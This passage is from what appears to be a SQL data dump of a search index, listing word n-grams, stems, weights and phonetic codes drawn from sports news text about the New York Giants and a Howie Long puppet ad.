team',0,1,1.3,'B350',1,'en'),(18370,'because amukamara','becaus amukamara',0,1,1.5667,'B25256',1,'en'),(18371,'because amukamara wouldn\'t','becaus amukamara wouldn',0,1,1.8667,'B252564353',1,'en'),(18372,'been happy','been happy',0,1,1.3333,'B510',1,'en'),(18373,'been happy if','been happy if',0,1,1.4333,'B510',1,'en'),(18374,'been studying','been studying',0,1,1.4333,'B52352',1,'en'),(18375,'been studying marty','been studying marty',0,1,1.6333,'B52352563',1,'en'),(18376,'before super','befor super',0,1,1.4,'B6216',1,'en'),(18377,'before super bowl','befor super bowl',0,1,1.5667,'B621614',1,'en'),(18378,'beyond','beyond',0,0,0.4,'B530',2,'en'),(18379,'beyond just','beyond just',0,1,1.3667,'B5323',1,'en'),(18380,'beyond just exciting','beyond just exciting',0,1,1.6667,'B53232352',1,'en'),(18381,'bit','bit',0,0,0.2,'B300',2,'en'),(18382,'bit of','bit of',0,1,1.2,'B310',1,'en'),(18383,'bit of time','bit of time',0,1,1.3667,'B3135',1,'en'),(18384,'blog','blog',0,0,0.2667,'B420',1,'en'),(18385,'blog april','blog april',0,1,1.3333,'B42164',1,'en'),(18386,'blog april 29','blog april 29',0,1,1.4333,'B42164',1,'en'),(18387,'bowl','bowl',0,0,0.2667,'B400',1,'en'),(18388,'bowl large','bowl large',0,1,1.3333,'B462',1,'en'),(18389,'bowl large syers','bowl large syers',0,1,1.5333,'B46262',1,'en'),(18390,'bowl xlviii','bowl xlviii',0,1,1.3667,'B4241',1,'en'),(18391,'bowl xlviii on','bowl xlviii on',0,1,1.4667,'B42415',1,'en'),(18392,'build a mini','build a mini',0,1,1.4,'B435',1,'en'),(18393,'build his','build his',0,1,1.3,'B432',1,'en'),(18394,'build his marionettes','build his marionettes',0,1,1.7,'B43256532',1,'en'),(18395,'business pages 9','busi pages 9',0,1,1.5333,'B25212',1,'en'),(18396,'busting','bust',0,0,0.4667,'B2352',1,'en'),(18397,'busting image','bust image',0,1,1.4333,'B235252',1,'en'),(18398,'busting image of','bust image of',0,1,1.5333,'B2352521',1,'en'),(18399,'but he','but he',0,1,1.2,'B300',1,'en'),(18400,'but he usually','but he usually',0,1,1.4667,'B324',1,'en'),(18401,'but there\'s','but there',0,1,1.3667,'B362',1,'en'),(18402,'but there\'s one','but there one',0,1,1.5,'B3625',1,'en'),(18403,'by ebenezer','by ebenezer',0,1,1.3667,'B526',1,'en'),(18404,'by ebenezer samuel','by ebenezer samuel',0,1,1.6,'B526254',1,'en'),(18405,'by rob','by rob',0,1,1.2,'B610',1,'en'),(18406,'by rob vacchiano','by rob vacchiano',0,1,1.5333,'B6125',1,'en'),(18407,'called','call',0,0,0.4,'C430',2,'en'),(18408,'called on','call on',0,1,1.3,'C435',1,'en'),(18409,'called on jan.14','call on jan.14',0,1,1.5333,'C43525',1,'en'),(18410,'can have','can have',0,1,1.2667,'C510',1,'en'),(18411,'can have liked','can have liked',0,1,1.4667,'C51423',1,'en'),(18412,'captain','captain',0,0,0.4667,'C135',1,'en'),(18413,'captain absolutely','captain absolutely',0,1,1.6,'C13512434',1,'en'),(18414,'captain absolutely cruz','captain absolutely cruz',0,1,1.7667,'C13512434262',1,'en'),(18415,'captain victor','captain victor',0,1,1.4667,'C1351236',1,'en'),(18416,'captain victor cruz','captain victor cruz',0,1,1.6333,'C1351236262',1,'en'),(18417,'certain','certain',0,0,0.4667,'C635',2,'en'),(18418,'certain relieved','certain relieved',0,1,1.5333,'C6356413',1,'en'),(18419,'certain relieved amukamara','certain relieved amukamara',0,1,1.8667,'C63564135256',1,'en'),(18420,'chill','chill',0,0,0.3333,'C400',1,'en'),(18421,'chill for','chill for',0,1,1.3,'C416',1,'en'),(18422,'chill for a','chill for a',0,1,1.3667,'C416',1,'en'),(18423,'chooses','choos',0,0,0.4667,'C000',1,'en'),(18424,'chooses to','choos to',0,1,1.3333,'C300',1,'en'),(18425,'chooses to be','choos to be',0,1,1.4333,'C310',1,'en'),(18426,'clear','clear',0,0,0.3333,'C460',1,'en'),(18427,'clear on','clear on',0,1,1.2667,'C465',1,'en'),(18428,'clear on wednesday','clear on wednesday',0,1,1.6,'C4653523',1,'en'),(18429,'co','co',0,0,0.1333,'C000',6,'en'),(18430,'co uk','co uk',0,1,1.1667,'C000',3,'en'),(18431,'co uk record','co uk record',0,1,1.4,'C6263',1,'en'),(18432,'competition','competit',0,0,0.7333,'C5135',2,'en'),(18433,'competition with','competit with',0,1,1.5333,'C51353',1,'en'),(18434,'competition with michael','competit with michael',0,1,1.8,'C51353524',1,'en'),(18435,'considered','consid',0,0,0.6667,'C52363',2,'en'),(18436,'considered i','consid i',0,1,1.4,'C52363',1,'en'),(18437,'considered i decided','consid i decided',0,1,1.6667,'C5236323',1,'en'),(18438,'contract','contract',0,0,0.5333,'C53623',3,'en'),(18439,'contract last','contract last',0,1,1.4333,'C53623423',1,'en'),(18440,'contract last week','contract last week',0,1,1.6,'C536234232',1,'en'),(18441,'cornerback','cornerback',0,0,0.6667,'C65612',1,'en'),(18442,'cornerback prince','cornerback prince',0,1,1.5667,'C656121652',1,'en'),(18443,'cornerback prince amukamara\'s','cornerback prince amukamara',0,1,1.9667,'C65612165252562',1,'en'),(18444,'covets','covet',0,0,0.4,'C132',1,'en'),(18445,'covets another','covet another',0,1,1.4667,'C132536',1,'en'),(18446,'covets another fact','covet another fact',0,1,1.6333,'C132536123',1,'en'),(18447,'crafted','craft',0,0,0.4667,'C613',1,'en'),(18448,'crafted a','craft a',0,1,1.3,'C613',1,'en'),(18449,'crafted a marionette','craft a marionette',0,1,1.6667,'C6135653',1,'en'),(18450,'cruz','cruz',0,0,0.2667,'C620',1,'en'),(18451,'cruz chooses','cruz chooses',0,1,1.4,'C620',1,'en'),(18452,'cruz chooses to','cruz chooses to',0,1,1.5,'C623',1,'en'),(18453,'cruz made','cruz made',0,1,1.3,'C6253',1,'en'),(18454,'cruz made it','cruz made it',0,1,1.4,'C6253',1,'en'),(18455,'cruz said','cruz said',0,1,1.3,'C623',1,'en'),(18456,'cruz said in','cruz said in',0,1,1.4,'C6235',1,'en'),(18457,'cut','cut',0,0,0.2,'C300',2,'en'),(18458,'cut fabric','cut fabric',0,1,1.3333,'C3162',1,'en'),(18459,'cut fabric from','cut fabric from',0,1,1.5,'C3162165',1,'en'),(18460,'days','dai',0,0,0.2667,'D200',4,'en'),(18461,'days later','dai later',0,1,1.3333,'D2436',1,'en'),(18462,'days later and','dai later and',0,1,1.4667,'D243653',1,'en'),(18463,'days that','dai that',0,1,1.3,'D230',1,'en'),(18464,'days that allows','dai that allows',0,1,1.5333,'D2342',1,'en'),(18465,'days to','dai to',0,1,1.2333,'D230',1,'en'),(18466,'days to build','dai to build',0,1,1.4333,'D23143',1,'en'),(18467,'decided','decid',0,0,0.4667,'D230',2,'en'),(18468,'decided to','decid to',0,1,1.3333,'D230',1,'en'),(18469,'decided to seen','decid to seen',0,1,1.5,'D2325',1,'en'),(18470,'defensive','defens',0,0,0.6,'D1521',1,'en'),(18471,'defensive lineman','defens lineman',0,1,1.5667,'D152145',1,'en'),(18472,'defensive lineman in','defens lineman in',0,1,1.6667,'D152145',1,'en'),(18473,'degrees','degre',0,0,0.4667,'D262',1,'en'),(18474,'degrees plus','degre plus',0,1,1.4,'D262142',1,'en'),(18475,'degrees plus wind','degre plus wind',0,1,1.5667,'D26214253',1,'en'),(18476,'developing','develop',0,0,0.6667,'D14152',1,'en'),(18477,'developing players','develop players',0,1,1.6,'D141521462',1,'en'),(18478,'developing players especially','develop players especially',0,1,1.9667,'D141521462124',1,'en'),(18479,'did not for','did not for',0,1,1.3667,'D5316',1,'en'),(18480,'dlala','dlala',0,0,0.3333,'D400',1,'en'),(18481,'draft','draft',0,0,0.3333,'D613',1,'en'),(18482,'draft but','draft but',0,1,1.3,'D61313',1,'en'),(18483,'draft but there\'s','draft but there',0,1,1.5667,'D6131362',1,'en'),(18484,'draft http','draft http',0,1,1.3333,'D6131',1,'en'),(18485,'draft http www','draft http www',0,1,1.4667,'D6131',1,'en'),(18486,'draft on','draft on',0,1,1.2667,'D6135',1,'en'),(18487,'draft on thurs','draft on thurs',0,1,1.4667,'D6135362',1,'en'),(18488,'draft picks','draft picks',0,1,1.3667,'D61312',1,'en'),(18489,'draft picks and','draft picks and',0,1,1.5,'D6131253',1,'en'),(18490,'drafting','draft',0,0,0.5333,'D61352',1,'en'),(18491,'drafting a','draft a',0,1,1.3333,'D61352',1,'en'),(18492,'drafting a protecting','draft a protecting',0,1,1.7,'D613521632352',1,'en'),(18493,'duffy','duffi',0,0,0.3333,'D100',1,'en'),(18494,'duffy square','duffi square',0,1,1.4,'D126',1,'en'),(18495,'duffy square the','duffi square the',0,1,1.5333,'D1263',1,'en'),(18496,'ebenezer','ebenez',0,0,0.5333,'E1526',1,'en'),(18497,'ebenezer samuel','ebenez samuel',0,1,1.5,'E1526254',1,'en'),(18498,'ebenezer samuel would','ebenez samuel would',0,1,1.7,'E15262543',1,'en'),(18499,'eliminate preventative','elimin preventative',0,1,1.7333,'E453161531',1,'en'),(18500,'eliminate preventative lineman','elimin preventative lineman',0,1,2,'E45316153145',1,'en'),(18501,'especially','especi',0,0,0.6667,'E2124',2,'en'),(18502,'especially high','especi high',0,1,1.5,'E21242',1,'en'),(18503,'especially high draft','especi high draft',0,1,1.7,'E212423613',1,'en'),(18504,'everything in','everyth in',0,1,1.4333,'E163525',1,'en'),(18505,'everything in my','everyth in my',0,1,1.5333,'E163525',1,'en'),(18506,'exciting','excit',0,0,0.5333,'E2352',1,'en'),(18507,'exciting the','excit the',0,1,1.4,'E23523',1,'en'),(18508,'exciting the giants','excit the giants',0,1,1.6333,'E235232532',1,'en'),(18509,'fabric','fabric',0,0,0.4,'F620',1,'en'),(18510,'fabric from','fabric from',0,1,1.3667,'F62165',1,'en'),(18511,'fabric from one','fabric from one',0,1,1.5,'F62165',1,'en'),(18512,'fact','fact',0,0,0.2667,'F230',4,'en'),(18513,'fact he','fact he',0,1,1.2333,'F230',1,'en'),(18514,'fact he wishes','fact he wishes',0,1,1.4667,'F232',1,'en'),(18515,'fifth','fifth',0,0,0.3333,'F300',1,'en'),(18516,'fifth year','fifth year',0,1,1.3333,'F360',1,'en'),(18517,'fifth year option','fifth year option',0,1,1.5667,'F36135',1,'en'),(18518,'filmed','film',0,0,0.4,'F453',1,'en'),(18519,'filmed last','film last',0,1,1.3667,'F453423',1,'en'),(18520,'filmed last tuesday','film last tuesday',0,1,1.6333,'F45342323',1,'en'),(18521,'first ro','first ro',0,1,1.2667,'F6236',1,'en'),(18522,'first round','first round',0,1,1.3667,'F623653',1,'en'),(18523,'first round of','first round of',0,1,1.4667,'F6236531',1,'en'),(18524,'first second','first second',0,1,1.4,'F623253',1,'en'),(18525,'first second and','first second and',0,1,1.5333,'F62325353',1,'en'),(18526,'first team','first team',0,1,1.3333,'F6235',2,'en'),(18527,'first team reps','first team reps',0,1,1.5,'F6235612',2,'en'),(18528,'five','five',0,0,0.2667,'F000',4,'en'),(18529,'five days','five days',0,1,1.3,'F320',1,'en'),(18530,'five days to','five days to',0,1,1.4,'F323',1,'en'),(18531,'for a quarterback','for a quarterback',0,1,1.5667,'F6263612',1,'en'),(18532,'for a single','for a single',0,1,1.4,'F62524',1,'en'),(18533,'for certain','for certain',0,1,1.3667,'F62635',1,'en'),(18534,'for certain relieved','for certain relieved',0,1,1.6667,'F626356413',1,'en'),(18535,'for developing','for developing',0,1,1.4667,'F6314152',1,'en'),(18536,'for developing players','for developing players',0,1,1.7333,'F63141521462',1,'en'),(18537,'for pizza','for pizza',0,1,1.3,'F612',1,'en'),(18538,'for pizza hut','for pizza hut',0,1,1.4333,'F6123',1,'en'),(18539,'for the ad','for the ad',0,1,1.3333,'F630',1,'en'),(18540,'for the long','for the long',0,1,1.4,'F63452',1,'en'),(18541,'form','form',0,0,0.2667,'F650',2,'en'),(18542,'form for','form for',0,1,1.2667,'F6516',2,'en'),(18543,'form for pizza','form for pizza',0,1,1.4667,'F651612',1,'en'),(18544,'former','former',0,0,0.4,'F656',1,'en'),(18545,'former raider','former raider',0,1,1.4333,'F65636',1,'en'),(18546,'former raider that','former raider that',0,1,1.6,'F656363',1,'en'),(18547,'four days','four days',0,1,1.3,'F632',1,'en'),(18548,'four days that','four days that',0,1,1.4667,'F6323',1,'en'),(18549,'four to','four to',0,1,1.2333,'F630',1,'en'),(18550,'four to five','four to five',0,1,1.4,'F631',1,'en'),(18551,'fox','fox',0,0,0.2,'F200',2,'en'),(18552,'fox analyst','fox analyst',0,1,1.3667,'F25423',1,'en'),(18553,'fox analyst howie','fox analyst howie',0,1,1.5667,'F25423',1,'en'),(18554,'fox\'s','fox',0,0,0.3333,'F200',1,'en'),(18555,'fox\'s temporary','fox temporary',0,1,1.5,'F23516',1,'en'),(18556,'fox\'s temporary times','fox temporary times',0,1,1.7,'F23516352',1,'en'),(18557,'friday','fridai',0,0,0.4,'F630',3,'en'),(18558,'friday he','fridai he',0,1,1.3,'F630',1,'en'),(18559,'friday he aim','fridai he aim',0,1,1.4333,'F635',1,'en'),(18560,'from one','from one',0,1,1.2667,'F650',1,'en'),(18561,'from one of','from one of',0,1,1.3667,'F651',1,'en'),(18562,'full blog','full blog',0,1,1.3,'F4142',1,'en'),(18563,'full blog april','full blog april',0,1,1.5,'F4142164',1,'en'),(18564,'funny\'','funni',0,0,0.4,'F500',1,'en'),(18565,'funny\' no','funni no',0,1,1.3,'F500',1,'en'),(18566,'funny\' no one','funni no one',0,1,1.4333,'F500',1,'en'),(18567,'geno','geno',0,0,0.2667,'G500',1,'en'),(18568,'geno smith','geno smith',0,1,1.3333,'G5253',1,'en'),(18569,'geno smith had','geno smith had',0,1,1.4667,'G5253',1,'en'),(18570,'geno smith you','geno smith you',0,1,1.4667,'G5253',1,'en'),(18571,'giants','giant',0,0,0.4,'G532',1,'en'),(18572,'giants learned','giant learned',0,1,1.4667,'G5324653',1,'en'),(18573,'giants learned option','giant learned option',0,1,1.7,'G5324653135',1,'en'),(18574,'giants offense','giant offense',0,1,1.4667,'G532152',1,'en'),(18575,'giants offense in','giant offense in',0,1,1.5667,'G5321525',1,'en'),(18576,'giants p','giant p',0,1,1.2667,'G5321',1,'en'),(18577,'giants p by','giant p by',0,1,1.3667,'G5321',1,'en'),(18578,'giants used','giant used',0,1,1.3667,'G5323',1,'en'),(18579,'giants used the','giant used the',0,1,1.5,'G5323',1,'en'),(18580,'giants\'','giant',0,0,0.4667,'G532',1,'en'),(18581,'giants\' gm','giant gm',0,1,1.3333,'G5325',1,'en'),(18582,'giants\' gm knows','giant gm knows',0,1,1.5333,'G5325252',1,'en'),(18583,'gm','gm',0,0,0.1333,'G500',1,'en'),(18584,'gm knows','gm knows',0,1,1.2667,'G5252',1,'en'),(18585,'gm knows that','gm knows that',0,1,1.4333,'G52523',1,'en'),(18586,'got','got',0,0,0.2,'G300',4,'en'),(18587,'got verification','got verification',0,1,1.5333,'G3161235',1,'en'),(18588,'got verification for','got verification for',0,1,1.6667,'G316123516',1,'en'),(18589,'had been','had been',0,1,1.2667,'H315',2,'en'),(18590,'had been studying','had been studying',0,1,1.5667,'H3152352',1,'en'),(18591,'had to','had to',0,1,1.2,'H300',1,'en'),(18592,'had to cut','had to cut',0,1,1.3333,'H323',1,'en'),(18593,'half','half',0,0,0.2667,'H410',1,'en'),(18594,'half hour','half hour',0,1,1.3,'H416',1,'en'),(18595,'half hour shoot','half hour shoot',0,1,1.5,'H41623',1,'en'),(18596,'happy','happi',0,0,0.3333,'H100',4,'en'),(18597,'happy if','happi if',0,1,1.2667,'H100',1,'en'),(18598,'happy if they','happi if they',0,1,1.4333,'H130',1,'en'),(18599,'have been','have been',0,1,1.3,'H150',4,'en'),(18600,'have been happy','have been happy',0,1,1.5,'H151',1,'en'),(18601,'have liked','have liked',0,1,1.3333,'H1423',1,'en'),(18602,'have liked what','have liked what',0,1,1.5,'H1423',1,'en'),(18603,'have may','have may',0,1,1.2667,'H150',1,'en'),(18604,'have may very','have may very',0,1,1.4333,'H1516',1,'en'),(18605,'he','he',0,0,0.1333,'H000',9,'en'),(18606,'he aim','he aim',0,1,1.2,'H500',1,'en'),(18607,'he aim appear','he aim appear',0,1,1.4333,'H516',1,'en'),(18608,'he can','he can',0,1,1.2,'H250',1,'en'),(18609,'he can have','he can have',0,1,1.3667,'H251',1,'en'),(18610,'he heard','he heard',0,1,1.2667,'H630',1,'en'),(18611,'he heard smith','he heard smith',0,1,1.4667,'H63253',1,'en'),(18612,'he makes','he makes',0,1,1.2667,'H520',1,'en'),(18613,'he makes his','he makes his',0,1,1.4,'H520',1,'en'),(18614,'he usually','he usually',0,1,1.3333,'H240',1,'en'),(18615,'he usually takes','he usually takes',0,1,1.5333,'H2432',1,'en'),(18616,'he was','he was',0,1,1.2,'H200',6,'en'),(18617,'he was called','he was called',0,1,1.4333,'H243',1,'en'),(18618,'he was treated','he was treated',0,1,1.4667,'H2363',1,'en'),(18619,'he wasn\'t','he wasn',0,1,1.3,'H253',1,'en'),(18620,'he wasn\'t afforded','he wasn afforded',0,1,1.6,'H253163',1,'en'),(18621,'he wishes','he wishes',0,1,1.3,'H200',1,'en'),(18622,'he wishes to','he wishes to',0,1,1.4,'H230',1,'en'),(18623,'headed','head',0,0,0.4,'H300',1,'en'),(18624,'headed for','head for',0,1,1.3333,'H316',1,'en'),(18625,'headed for a','head for a',0,1,1.4,'H316',1,'en'),(18626,'heard','heard',0,0,0.3333,'H630',1,'en'),(18627,'heard smith','heard smith',0,1,1.3667,'H63253',1,'en'),(18628,'heard smith is','heard smith is',0,1,1.4667,'H632532',1,'en'),(18629,'high draft','high draft',0,1,1.3333,'H23613',1,'en'),(18630,'high draft picks','high draft picks',0,1,1.5333,'H2361312',1,'en'),(18631,'his first','hi first',0,1,1.3,'H21623',1,'en'),(18632,'his first second','hi first second',0,1,1.5333,'H21623253',1,'en'),(18633,'his marionettes','hi marionettes',0,1,1.5,'H256532',1,'en'),(18634,'his marionettes but','hi marionettes but',0,1,1.6333,'H25653213',1,'en'),(18635,'his ralph','hi ralph',0,1,1.3,'H2641',1,'en'),(18636,'his ralph lauren','hi ralph lauren',0,1,1.5333,'H2641465',1,'en'),(18637,'hits and','hit and',0,1,1.2667,'H3253',1,'en'),(18638,'hits and misses','hit and misses',0,1,1.5,'H325352',1,'en'),(18639,'hour','hour',0,0,0.2667,'H600',1,'en'),(18640,'hour shoot','hour shoot',0,1,1.3333,'H623',1,'en'),(18641,'hour shoot syers','hour shoot syers',0,1,1.5333,'H623262',1,'en'),(18642,'howie','howi',0,0,0.3333,'H000',1,'en'),(18643,'howie long','howi long',0,1,1.3333,'H452',1,'en'),(18644,'howie long in','howi long in',0,1,1.4333,'H4525',1,'en'),(18645,'howie long takes','howi long takes',0,1,1.5333,'H45232',1,'en'),(18646,'http','http',0,0,0.2667,'H310',4,'en'),(18647,'http www','http www',0,1,1.2667,'H310',4,'en'),(18648,'http www ycol','http www ycol',0,1,1.4333,'H3124',3,'en'),(18649,'hut','hut',0,0,0.2,'H300',1,'en'),(18650,'hut super','hut super',0,1,1.3,'H3216',1,'en'),(18651,'hut super bowl','hut super bowl',0,1,1.4667,'H321614',1,'en'),(18652,'i decided','i decided',0,1,1.3,'I323',1,'en'),(18653,'i decided to','i decided to',0,1,1.4,'I323',1,'en'),(18654,'i have','i have',0,1,1.2,'I100',3,'en'),(18655,'i have may','i have may',0,1,1.3333,'I150',1,'en'),(18656,'if geno','if geno',0,1,1.2333,'I125',1,'en'),(18657,'if geno smith','if geno smith',0,1,1.4333,'I125253',1,'en'),(18658,'if they','if they',0,1,1.2333,'I130',1,'en'),(18659,'if they did','if they did',0,1,1.3667,'I130',1,'en'),(18660,'image','imag',0,0,0.3333,'I520',2,'en'),(18661,'image of','imag of',0,1,1.2667,'I521',1,'en'),(18662,'image of long','imag of long',0,1,1.4333,'I521452',1,'en'),(18663,'in 2014','in 2014',0,1,1.2333,'I500',1,'en'),(18664,'in 2014 the','in 2014 the',0,1,1.3667,'I530',1,'en'),(18665,'in four','in four',0,1,1.2333,'I516',1,'en'),(18666,'in four days','in four days',0,1,1.4,'I51632',1,'en'),(18667,'in my','in my',0,1,1.1667,'I500',1,'en'),(18668,'in my life','in my life',0,1,1.3333,'I541',1,'en'),(18669,'in new','in new',0,1,1.2,'I500',2,'en'),(18670,'in new york','in new york',0,1,1.3667,'I562',2,'en'),(18671,'in respond','in respond',0,1,1.3333,'I562153',1,'en'),(18672,'in respond to','in respond to',0,1,1.4333,'I562153',1,'en'),(18673,'in shining','in shining',0,1,1.3333,'I5252',1,'en'),(18674,'in shining armor','in shining armor',0,1,1.5333,'I5252656',1,'en'),(18675,'in the first','in the first',0,1,1.4,'I531623',1,'en'),(18676,'in the nfl','in the nfl',0,1,1.3333,'I53514',1,'en'),(18677,'in today\'s','in today',0,1,1.3333,'I532',1,'en'),(18678,'in today\'s nfl','in today nfl',0,1,1.4667,'I532514',1,'en'),(18679,'initial first','initi first',0,1,1.4333,'I5341623',1,'en'),(18680,'initial first team','initi first team',0,1,1.6,'I53416235',1,'en'),(18681,'is a busting','is a busting',0,1,1.4,'I212352',1,'en'),(18682,'is headed','is headed',0,1,1.3,'I230',1,'en'),(18683,'is headed for','is headed for',0,1,1.4333,'I2316',1,'en'),(18684,'it he','it he',0,1,1.1667,'I300',3,'en'),(18685,'it he wasn\'t','it he wasn',0,1,1.4,'I3253',1,'en'),(18686,'it perfectly','it perfectly',0,1,1.4,'I3161234',2,'en'),(18687,'it perfectly clear','it perfectly clear',0,1,1.6,'I3161234246',1,'en'),(18688,'it usually','it usually',0,1,1.3333,'I324',1,'en'),(18689,'it usually requires','it usually requires',0,1,1.6333,'I3246262',1,'en'),(18690,'it was 13','it was 13',0,1,1.3,'I320',1,'en'),(18691,'it was filmed','it was filmed',0,1,1.4333,'I321453',1,'en'),(18692,'it\'s true','it true',0,1,1.3,'I3236',1,'en'),(18693,'it\'s true that','it true that',0,1,1.4667,'I32363',1,'en'),(18694,'jan.14','jan.14',0,0,0.4,'J500',1,'en'),(18695,'jan.14 got','jan.14 got',0,1,1.3333,'J523',1,'en'),(18696,'jan.14 got verification','jan.14 got verification',0,1,1.7667,'J523161235',1,'en'),(18697,'jerry','jerri',0,0,0.3333,'J600',2,'en'),(18698,'jerry reese','jerri reese',0,1,1.3667,'J620',1,'en'),(18699,'jerry reese the','jerri reese the',0,1,1.5,'J623',1,'en'),(18700,'jerry reese\'s','jerri reese',0,1,1.4333,'J620',1,'en'),(18701,'jerry reese\'s seven','jerri reese seven',0,1,1.6333,'J6215',1,'en'),(18702,'jets','jet',0,0,0.2667,'J320',1,'en'),(18703,'jets after','jet after',0,1,1.3333,'J32136',1,'en'),(18704,'jets after the','jet after the',0,1,1.4667,'J321363',1,'en'),(18705,'jets uses','jet uses',0,1,1.3,'J320',1,'en'),(18706,'jets uses in','jet uses in',0,1,1.4,'J325',1,'en'),(18707,'just exciting','just exciting',0,1,1.4333,'J32352',1,'en'),(18708,'just exciting the','just exciting the',0,1,1.5667,'J323523',1,'en'),(18709,'just like','just like',0,1,1.3,'J342',1,'en'),(18710,'just like fox','just like fox',0,1,1.4333,'J34212',1,'en'),(18711,'knight','knight',0,0,0.4,'K523',1,'en'),(18712,'knight in','knight in',0,1,1.3,'K5235',1,'en'),(18713,'knight in shining','knight in shining',0,1,1.5667,'K5235252',1,'en'),(18714,'knows','know',0,0,0.3333,'K520',2,'en'),(18715,'knows that','know that',0,1,1.3333,'K523',1,'en'),(18716,'knows that in','know that in',0,1,1.4333,'K5235',1,'en'),(18717,'knows who','know who',0,1,1.3,'K520',1,'en'),(18718,'knows who the','know who the',0,1,1.4333,'K523',1,'en'),(18719,'large','larg',0,0,0.3333,'L620',3,'en'),(18720,'large syers','larg syers',0,1,1.3667,'L6262',1,'en'),(18721,'large syers who','larg syers who',0,1,1.5,'L6262',1,'en'),(18722,'last','last',0,0,0.2667,'L230',6,'en'),(18723,'last tuesday','last tuesday',0,1,1.4,'L2323',1,'en'),(18724,'last tuesday at','last tuesday at',0,1,1.5,'L2323',1,'en'),(18725,'last week','last week',0,1,1.3,'L232',1,'en'),(18726,'last week positive','last week positive',0,1,1.6,'L2321231',1,'en'),(18727,'later','later',0,0,0.3333,'L360',4,'en'),(18728,'later and','later and',0,1,1.3,'L3653',1,'en'),(18729,'later and it','later and it',0,1,1.4,'L3653',1,'en'),(18730,'lauren','lauren',0,0,0.4,'L650',13,'en'),(18731,'lauren outlet','lauren outlet',0,1,1.4333,'L65343',6,'en'),(18732,'lauren outlet with','lauren outlet with',0,1,1.6,'L65343',1,'en'),(18733,'lauren suits','lauren suits',0,1,1.4,'L65232',1,'en'),(18734,'lauren suits build','lauren suits build',0,1,1.6,'L65232143',1,'en'),(18735,'learned','learn',0,0,0.4667,'L653',1,'en'),(18736,'learned option','learn option',0,1,1.4667,'L653135',1,'en'),(18737,'learned option the','learn option the',0,1,1.6,'L6531353',1,'en'),(18738,'life','life',0,0,0.2667,'L100',7,'en'),(18739,'life it\'s','life it',0,1,1.3,'L132',1,'en'),(18740,'life it\'s true','life it true',0,1,1.4667,'L13236',1,'en'),(18741,'like fox','like fox',0,1,1.2667,'L212',1,'en'),(18742,'like fox analyst','like fox analyst',0,1,1.5333,'L2125423',1,'en'),(18743,'liked','like',0,0,0.3333,'L230',1,'en'),(18744,'liked what','like what',0,1,1.3333,'L230',1,'en'),(18745,'liked what he','like what he',0,1,1.4333,'L230',1,'en'),(18746,'likely','like',0,0,0.4,'L240',2,'en'),(18747,'likely 6','like 6',0,1,1.2667,'L240',1,'en'),(18748,'likely 6 1','like 6 1',0,1,1.3333,'L240',1,'en'),(18749,'lineman','lineman',0,0,0.4667,'L500',1,'en'),(18750,'lineman \'that','lineman that',0,1,1.4333,'L530',1,'en'),(18751,'lineman \'that may','lineman that may',0,1,1.5667,'L535',1,'en'),(18752,'lineman in','lineman in',0,1,1.3333,'L500',1,'en'),(18753,'lineman in the','lineman in the',0,1,1.4667,'L530',1,'en'),(18754,'lineman that\'s','lineman that',0,1,1.4667,'L532',1,'en'),(18755,'lineman that\'s modern','lineman that modern',0,1,1.7,'L5325365',1,'en'),(18756,'long considered','long considered',0,1,1.5,'L5252363',1,'en'),(18757,'long considered i','long considered i',0,1,1.5667,'L5252363',1,'en'),(18758,'long in','long in',0,1,1.2333,'L525',1,'en'),(18759,'long in four','long in four',0,1,1.4,'L52516',1,'en'),(18760,'long marionette','long marionette',0,1,1.5,'L525653',1,'en'),(18761,'long marionette it','long marionette it',0,1,1.6,'L525653',1,'en'),(18762,'long saw','long saw',0,1,1.2667,'L520',1,'en'),(18763,'long saw the','long saw the',0,1,1.4,'L523',1,'en'),(18764,'long syers','long syers',0,1,1.3333,'L5262',1,'en'),(18765,'long syers had','long syers had',0,1,1.4667,'L52623',1,'en'),(18766,'long takes','long takes',0,1,1.3333,'L5232',1,'en'),(18767,'long takes puppet','long takes puppet',0,1,1.5667,'L523213',1,'en'),(18768,'look at several','look at several',0,1,1.5,'L232164',1,'en'),(18769,'looks','look',0,0,0.3333,'L200',1,'en'),(18770,'looks just','look just',0,1,1.3333,'L230',1,'en'),(18771,'looks just like','look just like',0,1,1.5,'L2342',1,'en'),(18772,'luxury','luxuri',0,0,0.4,'L260',1,'en'),(18773,'luxury on','luxuri on',0,1,1.3,'L265',1,'en'),(18774,'luxury on this','luxuri on this',0,1,1.4667,'L26532',1,'en'),(18775,'made it','made it',0,1,1.2333,'M300',1,'en'),(18776,'made it perfectly','made it perfectly',0,1,1.5667,'M3161234',1,'en'),(18777,'makes his','make his',0,1,1.3,'M200',1,'en'),(18778,'makes his first','make his first',0,1,1.5,'M21623',1,'en'),(18779,'marionette','marionett',0,0,0.6667,'M653',1,'en'),(18780,'marionette it','marionett it',0,1,1.4333,'M653',1,'en'),(18781,'marionette it was','marionett it was',0,1,1.5667,'M6532',1,'en'),(18782,'marionette that','marionett that',0,1,1.5,'M653',1,'en'),(18783,'marionette that looks','marionett that looks',0,1,1.7,'M65342',1,'en'),(18784,'marionettes','marionett',0,0,0.7333,'M6532',1,'en'),(18785,'marionettes but','marionett but',0,1,1.5,'M653213',1,'en'),(18786,'marionettes but he','marionett but he',0,1,1.6,'M653213',1,'en'),(18787,'marty','marti',0,0,0.3333,'M630',1,'en'),(18788,'marty mornhinweg','marti mornhinweg',0,1,1.5333,'M635652',1,'en'),(18789,'marty mornhinweg talk','marti mornhinweg talk',0,1,1.7,'M635652342',1,'en'),(18790,'may likely','mai likely',0,1,1.3333,'M424',1,'en'),(18791,'may likely 6','mai likely 6',0,1,1.4,'M424',1,'en'),(18792,'may very','mai very',0,1,1.2667,'M160',1,'en'),(18793,'may very well','mai very well',0,1,1.4333,'M164',1,'en'),(18794,'may well','mai well',0,1,1.2667,'M400',1,'en'),(18795,'may well funny\'','mai well funny',0,1,1.5,'M415',1,'en'),(18796,'michael','michael',0,0,0.4667,'M240',2,'en'),(18797,'michael vick','michael vick',0,1,1.4,'M2412',1,'en'),(18798,'michael vick and','michael vick and',0,1,1.5333,'M241253',1,'en'),(18799,'mini','mini',0,0,0.2667,'M000',1,'en'),(18800,'mini suit','mini suit',0,1,1.3,'M230',1,'en'),(18801,'mini suit for','mini suit for',0,1,1.4333,'M2316',1,'en'),(18802,'minicamp','minicamp',0,0,0.5333,'M251',1,'en'),(18803,'minicamp if','minicamp if',0,1,1.3667,'M251',1,'en'),(18804,'minicamp if geno','minicamp if geno',0,1,1.5333,'M25125',1,'en'),(18805,'misses','miss',0,0,0.4,'M200',1,'en'),(18806,'misses of','miss of',0,1,1.3,'M210',1,'en'),(18807,'misses of jerry','miss of 